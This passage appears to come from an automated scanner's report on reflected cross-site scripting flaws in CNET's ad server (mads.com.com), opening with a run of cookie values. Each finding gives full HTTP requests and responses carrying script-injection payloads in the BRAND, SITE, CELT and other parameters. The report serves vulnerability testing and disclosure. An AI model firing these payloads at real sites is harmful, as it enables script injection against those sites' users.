1AxsYBzoLba+u6l87gczye8xuTrYhFfwlnHydy7IYalgPJBk32vZgWW2CXqypZtqnwMKkA2NoSDvvRLOZsd5s2E5nriVmz0A020hMNet6ezR0BbsbFJkikbhD25+D5hxe38KqYGvD586gb8nEzI0j5isfTJ/lkLrhbQFBZeshLI9NVhvhrxY3ujvMVlKz2TG/zsc7BVzk9fFPtT7mgROfudWRI+VvwrnXNE2vCSQzOJZeEAKPJctLVBCeeH5f0I+bMVOeVLPDBFeBnbAN+UOthqW+XB3wOga/8nLvsjoupDcwH+hneOk/D89Naxn/NKF3MEN04OWc1SJ6wrzqU6VhG4EvS+Zv+fJ8Gt98W7PtFLVLD0oQ=="; rsi_us_1000000="pUMV4ylDPxYY7RUCt3RYS68XU2Z/uOqvJR0SNgYO9rFAJiyyAu+FxS1Z30ODwyEFcoEx3T1Eetffz3Mf20XkwCrwYFLZZJxtyzGTJat2XTjlIN8P+hQPSL5K9zsL+kusRTvgKYlhihBhqZKK6GKen73oVAV9BWGkbl//D/fTGMFsID28cq6D7duOtAY3S7ThixmzbEOMxOHaa0VO3cDkKGVKS9qitOaUYlvgkLY1MKDOtODLrFUkILMlSRpCe7+47YCa4Yvgfmntw+kxPheKq6wDe8Fd8gOqjo+YsYcbcBetJ/UlUtydzNb+VQfdT8dEj/2h41IZ5vmY/5vsAZW1gUJs43Y9iklV1tAb9jY/G3Rk4zy39xByfOtBbqnZZm8zU97WhpjXwdwTrCSEuJ4CNdY/fhO3f+aPVPTKG9RnYRL0QJ4kFGhThODFPtf76e2qY1SQ9slSHrnY01CTJTrHMxySjJKQAVAr1obI8ilzYsPlaT1OSvYVS9TK9PoGrO5Jx5bXw/zwwE6Wrxwt7KjBiQjMb8pc2/6daLQ71r2XwEeaREz3clc3XYbmXIZKYmXXjpSqe6jB0kwcSkFst/ViDZpkDsFltV4ci5YQ/eJMqmyKrF/0uup6pq93xJKQibeBPvkCxBjBIGLPE6+meOzdSPUPxAyoXPah9kyi7C70w/Ic06E82HDgxMfptenJH+QxMcJPPGsyFAVT+6SBuOjuKJ5KYDNUBXyxL2dg7B2oqDAiqh1W+megWtR3XoJXxE+b3k70BKlvT5YvEuZ0/RALqrZKe/52guDCx1yv8IEqB3NuIb5M9E0P1eLplz4HhYGMt1XJa6PPDxd4ljqvSFEQClJtagh9UzDEFg6Cb5LdDadrKiwtHRl62r3F/lJB8Wq3syJAxzEPLO4bM0VnXvq5faJnoE+6gBD5yjyVDaOWRfQzLGIWkNHa+f2KJvAyTQlC4oHYQZOGM/cVc3WrnRQmj1KDwCk/46Dq6gu9fFpETdaKz7DpE5AVcVASeUiRu6t0E9gdbxRFlQnHfQxlj0O0yv/8sVDJfLtBv7VEv6KvS85d/vyrS+3/lJtowlLX877yZqlnDrYhsgIzJ/B2kGU/Y2tWcJtJNzrSLvL6uC6zAE3YCN+2b8ZfetlvToWWUxLm+kOAX5sNQa84+z+Y7BiXKA28ArWYuR2BzhZYqV+lNsl8IuYWHrQEhBevE6yTgfXBfZ5ZWDuef3muciM4uxq9eRevsktzwd4ZolhUro4q9RDXzP+z/Jt3SlkekF3F1UyZn5rEt9sK3VhPrPz7bFs0pGO/fShWwUhEJGkkGofDmr7oO9xVS0wlWlGR+HiZLLiNXtFztdl/InifBdzZrv7tEgPT/Ekl1qqx4lzM76Hls1fjGRalSthbIGWedXoj3t9T64fqUJnYWdom7ygUV4OI6Uek4g2aJV2sE2HBrV7ibQMfkHW6H2qlf/AvGzXk5juIW8AOsU6N3bJugxzerwleYqkN4SEXHO2TsUUB2Hii30ULmVN5KVwl4AT7t07WbQfIgUgh+J4zgAJSZ1//mvY7cAo2t7r+WZ+3UqK9EVFlB88NDlOgh4Jm3SdKvwyEx2VIxC8FQZezWpUIHfmHUohseSJ3s3QYI0FyZt+UimHMdHcAt0unq75eibm7XCXgvJjZ8QEa2uTso9gthoSRwjtm4zJD8KuDs9Dol9dL10gwkePtd9XjMMl1IiMfHEGPMzYrTXatfWNnptioKHatYztwbz3JzwC1e1SaBMwSq2wE51biaKnVTIX7gjw1dfMUEcH+SSwe4EKfaZDW3Y8jNtoFzFv7v+gK3Q=="; NETSEGS_E05510=bff01c00ddc153c5&E05510&0&4df0b096&0&&4dc9f625&271d956a153787d6fee9112e9c6a9326; udm_0=MLv39CEJZjpv597JwHIRxS7gdG4nwPAq6ZuDH+vX93uE8x+80+EqavgLMjsVMcRzx4ED/5sU/DdHAgOy6ZFF6u9krYB07BFG6K2gCx9zATNAOyKPGfTqVHvkpDwSF+KJXhEbXYpBgIjd3IWX3TqLfPz6jE8vTUf3pdaWUiZB3YUWt0CiIC5F0X3tPgb/SivyvtveJcRXnIKv7kXwRgYvCvr55V+AZTEVXPZ4e3YCovCIOgMpRBSkPQefrNyf8+fevxeSnnxLtLBTd7bn/zQn98TJd0YWeOHbFIVzmnJlL/meZ5F8yEzm7HiS+gYXKCqjfBEgEJXe7pa4nhHi/FyghIrWjtv72jtBRuTmEa1PtCcp9wfqOSXME/TC3DDlgc0Ij565ULgb+NLzIZ6TpI8vIyqOkYR2CJSFdZdVnBUG0ncgAuL4be/4qG/lpeLJAr4R2ZcdSh9ENtyBu0UsstxyoNHHwBT0SxG1olEQxWdxat7mSTK4NzNH7bvJyyZeNxeZoviFwczbub9BMnSayVKnrf8mLmZYn0G+URiIr9to1aqeDG6xKYVAmQwGVEGKynGOyuqpwObt+MyvmywUWEZ1qy3YzLOSZi95dlvgQqf5nm2jI0E/rWzPceCg9nrDXdY5aA2KiG6/Ag/Qtn9BE0P6tHnl8GXHStyZrY4yXNhIUbljw44dlYagYpCHt4M3J4bPZG8YwZUp0ecARePUDtezFyfvRsc1iatb1pDP+cq/6Iul6LmWpIrzCvxlo9THyXVf5SG33tg9Lw2R/Ro5VrxlHAMqi5EG0xBZZuKHWEnXQrAXGw8FaURhjx71p9CkHtHT1BpsJC15G4HDCuuHnAqa2MRPkYaEZL2cVa7b84SiSmL76sma6ZAVTmsWibG6oMtgf+rO6uurjCoZJ5OCsW83NGfMcjZCzPl33xUGXappEWzObGyaUvOz7ose722NuQ6CgmfMlORcS+CfKwXULjWH6Zy36QCvGrnsM/T/4K0FLlEQnA/ZrpS8O/uyK8UlrSZbknpF5SKlqTmNy5yEGuQ4SS+qP+oPyRgWbGkd6TLhbS8wVZYRN53ZAc0jxNNVRDNVFRE9QSI2VrlZ/Ka1RizjzXzy0Mrq6kcHNlCK91uDwhC94dfZh3mu4LEbkhOgwvScvmwGeZy8gGWoQEjk0gAgb9SgQmtGBl5C+T7TrdHq6EejqJkS0OH/st2RxRBZGNqPJSPFO3Z9nkwH7dr0G89yU1lVThr9TPeyrKuuQlOnafjtcNVr+buGb3emJOGcjzfH90v2UdAQiKm9gZ6BDbLaq/nbVWxP/5HqWbZLa2/RS2GM94ibxZPKXwTQTSnoK6758zl7N8nLPQGrb7mauaNrJ0v4zNciOQWnVNzZaqhQO8UVgcjuWrUQiJTPQWDKxu4w8eoM53ZEdNIh7WnKbwDRVqkqD0y1KsGwOeg2fZkSaLcNFed69lS3DYgh37CBN1ozAybkSybs/DUjRL93JTQZlPIkdLkbJkhmGdhN2G2Xb4uomwrwx4xxkHDHG3BOj3sObWJNvojJs1Id/pPS2nPanvOm; rsi_segs_1000000=pUPF4kmhOHMQJvAtY6gq+mkAZPosg7ZjSjmgIGbYEtpU+w6+9L4ioURjDVUZb5s2bJaZJyc3lSTsOodoc+LzjgnPXWfftsdz6As2U+S4m3sZ93GnJHkwYOujESwdtKPV2XiklIXPPxY08/+jghS00wcrqZXadzeLZbfrn9ShlwBQ2xmbpA283BtMERrEkp0Jl7AlGaEi8uw/pmdbkTDTCxPk3RxS+r7mTK51H+dLGRbW1fSty/wzVcn4GiBJEhk/0uP0JFLwQAUiAigtm0ZNVycI9AGE/kbo+Gm2GaMwx2IDZVAxGSGKhVfyxDow7LMEpP+/5AxB2aqXpAeWvKTgzd0wbPD0VLITZHo4oKcp6znXDZ/0QtZDxMyG+eh98ur0yF4RcpWqIFje74P6+IbKGLCNtlrtWjwe4OKLvE7KtEgbkcPkFFEShWCdZOSVCnDDkQcZ7HqnUdiwoMeOl35blI92a8QslLUelxYP8/7ksRF/dL4tgXNSVaB+tc0Q5yCGeoBCNTt3rHulcarLm9u5vCWFGW2APunE21aEXgSBAE52Pz5NcqBzMbUN/aEDea9hT+n/3Y/e5hgqyzCkCuGvIG755LivtanLgcg2kcQ5uwmgC0vJQMjRNKX40aTX4VArAzArEgBdkaBkXfsvkFD+Nbxz+zvek4KSXCepFAowCLMZjznkiJClqCAqKRQUoG7+ayD2Ys4bs0RrCwTlot+9B1Fervh4516lHDTrQVdcQIQ5uu++FItEtxejK+cd66ciMtQpvPlEfyhWIHOWGVBeyuJu+FtYTiNAvtNO6ZKSdLQTUzHI1ezwsB4RXs2oHFesxvqomNGH01i4; rtc_IJp3=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Thu, 12 May 2011 13:28:29 GMT
Cache-Control: max-age=86400, private
Expires: Fri, 13 May 2011 13:28:29 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Thu, 12 May 2011 13:28:29 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "K05540AD57A<SCRIPT>ALERT(1)</SCRIPT>DB723B0C3CF" was not recognized.
*/

2.102. http://mads.com.com/mac-ad [&&&&&&adfile parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.com.com
Path:   /mac-ad

Issue detail

The value of the &&&&&&adfile request parameter is copied into the HTML document as plain text between tags. The payload 90a7b<a>03a92f842f2 was submitted in the &&&&&&adfile parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?&_RGROUP=13038&&CNET-BRAND-ID=2&HUB=cn&PTNR=2&LOCALE=en_US&CNET-SITE-ID=2&ASSET_HOST=adimg.com.com&&&&&&&ENG:DATETIME=2011.05.12.09.28.27&SYS:RQID=01phx1-ad-e19:4DCB7A2656E16D&&REFER_HOST=tag.admeld.com&&&&&&&adfile=7074/11/445195_wc.ca90a7b<a>03a92f842f2 HTTP/1.1
Host: mads.com.com
Proxy-Connection: keep-alive
Referer: http://mads.com.com/mac-ad?CELT=ifc&BRAND=2&SITE=2&ADSTYLE=NOOVERGIF&_RGROUP=13038
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XCLGFbrowser=Cg8JIk24ijttAAAASDs

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:41 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Thu, 12 May 2011 13:33:41 GMT
Content-Length: 594

<!-- MAC ad --><!-- NO AD TEXT: _QUERY_STRING="&_RGROUP=13038&&CNET-BRAND-ID=2&HUB=cn&PTNR=2&LOCALE=en_US&CNET-SITE-ID=2&ASSET_HOST=adimg.com.com&&&&&&&ENG:DATETIME=2011.05.12.09.28.27&SYS:RQID=01phx1-ad-e19:4DCB7A2656E16D&&REFER_HOST=tag.admeld.com&&&&&&&adfile=7074/11/445195_wc.ca90a7b<a>03a92f842f2" _REQ_NUM="0" -->
...[SNIP]...

2.103. http://mads.com.com/mac-ad [BRAND parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.com.com
Path:   /mac-ad

Issue detail

The value of the BRAND request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7654a"><script>alert(1)</script>e0762987b06 was submitted in the BRAND parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?CELT=ifc&BRAND=27654a"><script>alert(1)</script>e0762987b06&SITE=2&ADSTYLE=NOOVERGIF&_RGROUP=13038 HTTP/1.1
Host: mads.com.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf?t=1305206897249&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XCLGFbrowser=Cg8JIk24ijttAAAASDs

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:29:22 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 12 May 2011 13:29:22 GMT
Content-Length: 2486

<!-- MAC ad -->
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>CNET ad iframe content</title>
<style
...[SNIP]...
<a href="http://adlog.com.com/adlog/c/r=13038&amp;sg=445195&amp;o=&amp;h=cn&amp;p=2&amp;b=27654a"><script>alert(1)</script>e0762987b06&amp;l=en_US&amp;site=2&amp;pt=&amp;nd=&amp;pid=&amp;cid=&amp;pp=&amp;e=&amp;rqid=01phx1-ad-e16:4DCB4EC77D9544&amp;orh=admeld.com&amp;oepartner=&amp;epartner=&amp;ppartner=&amp;pdom=tag.admeld.com&amp;
...[SNIP]...

2.104. http://mads.com.com/mac-ad [BRAND parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.com.com
Path:   /mac-ad

Issue detail

The value of the BRAND request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d12c"><script>alert(1)</script>c5876294348 was submitted in the BRAND parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?CELT=ifc&BRAND=1d12c"><script>alert(1)</script>c5876294348&SITE=2&ADSTYLE=NOOVERGIF&_RGROUP=13038 HTTP/1.1
Host: mads.com.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf?t=1305206897249&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XCLGFbrowser=Cg8JIk24ijttAAAASDs

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:29:26 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 12 May 2011 13:29:26 GMT
Content-Length: 2483

<!-- MAC ad -->
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>CNET ad iframe content</title>
<style
...[SNIP]...
<iframe src="http://mads.com.com/mac-ad?&amp;_RGROUP=13038&amp;&amp;CNET-BRAND-ID=1d12c"><script>alert(1)</script>c5876294348&amp;HUB=cn&amp;PTNR=2&amp;LOCALE=en_US&amp;CNET-SITE-ID=2&amp;ASSET_HOST=adimg.com.com&amp;&amp;&amp;&amp;&amp;&amp;&amp;ENG:DATETIME=2011.05.12.09.29.26&amp;SYS:RQID=01phx1-ad-e20:4DCB7FE15237E7&amp;
...[SNIP]...

2.105. http://mads.com.com/mac-ad [CELT parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.com.com
Path:   /mac-ad

Issue detail

The value of the CELT request parameter is copied into the HTML document as plain text between tags. The payload a300e<a>fc79e3bca16 was submitted in the CELT parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?CELT=ifca300e<a>fc79e3bca16&BRAND=2&SITE=2&ADSTYLE=NOOVERGIF&_RGROUP=13038 HTTP/1.1
Host: mads.com.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf?t=1305206897249&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XCLGFbrowser=Cg8JIk24ijttAAAASDs

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:28:52 GMT
Server: Apache/2.2
Content-Length: 388
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: text/plain
Expires: Thu, 12 May 2011 13:28:52 GMT

<!-- MAC ad --><!-- NO AD TEXT: _QUERY_STRING="CELT=ifca300e<a>fc79e3bca16&BRAND=2&SITE=2&ADSTYLE=NOOVERGIF&_RGROUP=13038" _REQ_NUM="0" --><!-- MAC-AD STATUS: ; MAPPING UNEXPECTED CELT &quot;ifca300e
...[SNIP]...

2.106. http://mads.com.com/mac-ad [SITE parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.com.com
Path:   /mac-ad

Issue detail

The value of the SITE request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd19e"><script>alert(1)</script>db9b41f1aae was submitted in the SITE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?CELT=ifc&BRAND=2&SITE=2fd19e"><script>alert(1)</script>db9b41f1aae&ADSTYLE=NOOVERGIF&_RGROUP=13038 HTTP/1.1
Host: mads.com.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf?t=1305206897249&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XCLGFbrowser=Cg8JIk24ijttAAAASDs

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:29:34 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 12 May 2011 13:29:34 GMT
Content-Length: 2065

<!-- MAC ad -->
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>CNET ad iframe content</title>
<style
...[SNIP]...
<img src="http://adlog.com.com/adlog/i/r=13038&amp;sg=513958&amp;o=&amp;h=cn&amp;p=2&amp;b=2&amp;l=en_US&amp;site=2fd19e"><script>alert(1)</script>db9b41f1aae&amp;pt=&amp;nd=&amp;pid=&amp;cid=&amp;pp=&amp;e=&amp;rqid=00phx1-ad-e16:4DCBD1AEFF9C8&amp;orh=admeld.com&amp;ort=&amp;oepartner=&amp;epartner=&amp;ppartner=&amp;pdom=tag.admeld.com&amp;cpnmodule=&amp;
...[SNIP]...

2.107. http://mads.com.com/mac-ad [SITE parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.com.com
Path:   /mac-ad

Issue detail

The value of the SITE request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19a61"><script>alert(1)</script>325ea0f4ed7 was submitted in the SITE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?CELT=ifc&BRAND=2&SITE=19a61"><script>alert(1)</script>325ea0f4ed7&ADSTYLE=NOOVERGIF&_RGROUP=13038 HTTP/1.1
Host: mads.com.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf?t=1305206897249&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XCLGFbrowser=Cg8JIk24ijttAAAASDs

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:29:45 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 12 May 2011 13:29:45 GMT
Content-Length: 2488

<!-- MAC ad -->
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>CNET ad iframe content</title>
<style
...[SNIP]...
<iframe src="http://mads.com.com/mac-ad?&amp;_RGROUP=13038&amp;&amp;CNET-BRAND-ID=2&amp;HUB=cn&amp;PTNR=2&amp;LOCALE=en_US&amp;CNET-SITE-ID=19a61"><script>alert(1)</script>325ea0f4ed7&amp;ASSET_HOST=adimg.com.com&amp;&amp;&amp;&amp;&amp;&amp;&amp;ENG:DATETIME=2011.05.12.09.29.45&amp;SYS:RQID=00phx1-ad-e15:4DCB4CB280090E&amp;&amp;REFER_HOST=tag.admeld.com&amp;&amp;&amp;&amp;&amp;&am
...[SNIP]...

2.108. http://mads.com.com/mac-ad [_RGROUP parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.com.com
Path:   /mac-ad

Issue detail

The value of the _RGROUP request parameter is copied into an HTML comment. The payload 1cf86--><a>0abcf34b1c3 was submitted in the _RGROUP parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /mac-ad?CELT=ifc&BRAND=2&SITE=2&ADSTYLE=NOOVERGIF&_RGROUP=130381cf86--><a>0abcf34b1c3 HTTP/1.1
Host: mads.com.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf?t=1305206897249&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
